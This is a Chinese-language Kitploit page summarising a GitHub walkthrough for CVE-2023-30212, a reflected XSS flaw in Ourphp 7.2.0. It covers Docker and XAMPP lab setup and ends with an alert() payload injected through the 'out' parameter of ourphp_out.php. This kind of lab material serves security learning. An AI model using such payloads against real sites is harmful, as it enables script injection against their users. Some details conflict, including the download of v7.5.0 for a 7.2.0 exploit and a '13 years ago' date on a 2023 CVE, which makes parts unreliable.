Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-30212 — CVE-2023-30212的详细利用指南,这是Ourphp 7.2.0中的一个XSS漏洞,包含Docker环境搭建和payload注入演示。 | Kitploit
工具/GitHubGitHub/kai-iszz/cve-2023-30212
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubkai-iszz/cve-2023-30212

CVE-2023-30212

CVE-2023-30212的详细利用指南,这是Ourphp 7.2.0中的一个XSS漏洞,包含Docker环境搭建和payload注入演示。

查看仓库
13年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-30212

利用 Ourphp 7.2.0 版本中的漏洞,也称为 CVE-2023-30212

步骤 1. 在您的系统中下载并安装 Docker (注意)我使用 Docker 是因为它快速且易于安装 Ubuntu。

步骤 2. 设置 Docker 环境

root@kitploit:~
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash

步骤 3. 安装 web 服务器、php 和 mysql。我将为此安装 xampp 服务器。

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run 
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start

步骤 4. 下载 Ourphp 7.2.0 版本

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775

步骤 5. 在浏览器中设置 Ourphp 打开浏览器并输入 localhost 或 127.0.0.1 按照说明安装 Ourphp。

步骤 6. 利用该漏洞 Ourphp 7.2.0 版本存在 XSS(跨站脚本)漏洞。 要修复 /client/manage/ourphp_out.php 文件中允许执行 XSS 代码的漏洞,

您需要修改代码。该漏洞出现在将 "ourphp_admin" 参数设置为 "logout" 时,可控变量 "out" 被回显。

攻击者可以通过注入类似 </script><script>alert(xss)</script> 的有效载荷来利用此漏洞。

root@kitploit:~
代码:http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

2023年5月29日 13:57:40 截图

下载工具